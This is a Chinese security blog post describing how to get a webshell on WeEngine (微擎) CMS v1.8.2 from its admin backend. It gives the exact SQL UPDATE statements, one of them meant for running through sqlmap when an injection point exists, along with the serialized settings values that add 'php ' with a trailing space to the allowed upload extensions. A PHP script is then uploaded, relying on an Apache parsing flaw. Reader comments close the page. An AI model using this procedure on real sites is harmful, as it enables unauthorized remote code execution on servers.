微擎后台GETSHELL

好大一条虫 916 次浏览 3
微擎是一款由宿州涛盛网络科技有限公司研发的免费开源的公众号管理系统,基于目前最流行的WEB2.0的架构(php+mysql),拥有成熟、稳定的的技术解决方案。

通过上篇的文章,又发现了拿shell的新姿势!

微擎cms绕过禁用函数写shell

0x01 序言

很想做一些事情,但是身不由己。很多事情不能静下心来去完成。趁着服务器快要到期.赶紧把文章写出来。

0X02 正文

  • 漏洞环境
  • apache
  • php7.2
  • 版本: v1.8.2(201812130002)

站点-附件设置-支持文件后缀
微擎后台GETSHELL

在安装完成的时候,数据库里面并没有写入支持文件后缀的值,需要我们进行添加需要的脚本格式php等等

微擎后台GETSHELL

直接写上支持的后缀为php是会带入到数据库的,提交完毕以后数据库会显示可上传的值

a:3:{s:16:"attachment_limit";  
i:0;s:5:"image";a:5:{s:5:"thumb";i:0;s:5:  
"width";i:800;s:10:"extentions";  
a:4:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;s:3:"png";}  
s:5:"limit";i:5000;s:14:"zip_percentage";s:3:"100";}  
s:5:"audio";a:2:{s:10:"extentions";a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}

0x03 漏洞利用

写入任意字符
微擎后台GETSHELL

a:3:{s:16:"attachment_limit";i:0;s:5:"image";  
a:5:{s:5:"thumb";i:0;s:5:"width";i:800;s:10:"extentions";  
a:5:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;  
s:3:"png";i:4;s:3:"aaa";}s:5:"limit";i:5000;
s:14:"zip_percentage";s:3:"100";}s:5:"audio";  
a:2:{s:10:"extentions";  a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}

站点-常用工具-数据库-执行SQL语句替换之前插入的值 (记得打开调试模式)

UPDATE ims_core_settings SET value = replace(value, 'aaa', 'php ')

注意php后有一个空格

or 如果在渗透过程中有SQL注入点的情况下 有用户权限能够上传,尝试直接在SQLMAP执行语句

UPDATE `ims_core_settings` SET
`key` = 'upload',
`value` = 'a:2:{s:5:\"image\";a:4:{s:5:\"thumb\";i:0;  
s:5:\"width\";i:800;s:10:\"extentions\";  
a:5:{i:0;s:3:\"gif\";i:1;s:3:\"jpg\";i:2;  
s:4:\"jpeg\";i:3; s:3:\"png\";i:4;s:3:\"php \";}  
s:5:\"limit\";i:5000;}s:5:\"audio\";  
a:2:{s:10:\"extentions\";a:1:{i:0;s:3:\"mp3\";}s:5:\"limit\";i:5000;}}'
WHERE `key` = 'upload' AND `key` = 'upload' COLLATE utf8mb4_bin;

微擎后台GETSHELL

a:3:{s:16:"attachment_limit";i:0;s:5:"image";  
a:5:{s:5:"thumb";i:0;s:5:"width";i:800;s:10:"extentions";  
a:5:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;  
s:3:"png";i:4;s:3:"php ";}s:5:"limit";i:5000;  
s:14:"zip_percentage";s:3:"100";}s:5:"audio";  
a:2:{s:10:"extentions";a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}

执行完毕-系统-更新缓存
微擎后台GETSHELL

0x04 上传php 文件

以上全部操作完毕,直接在可以上传图片的地方进行上传脚本
微擎后台GETSHELL

0x05 结语

另外在nginx中测试未成功,拜读了P牛的文章,利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单

在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》已经提到过,fpm存在一个security.limit_extensions配置,默认只解析php后缀的文件,多一个换行也不行。

此外还有另外的方法拿shell 抛砖引玉 只能怪系统环境了 ~

PS:土司论坛的表哥搭了一个商业版本的 同样为apache的,也是直接秒

发表评论 取消回复
表情 图片 链接 代码

  1. 1
    1 Lv 1

    老哥,上班我都不敢看你文章

    • 黄大仙
      黄大仙 站长

      @1有这么夸张吗 - -

  2. ll
    ll Lv 1

    这么多开车图,你是怎么静下心来的 我都看得脸红红的了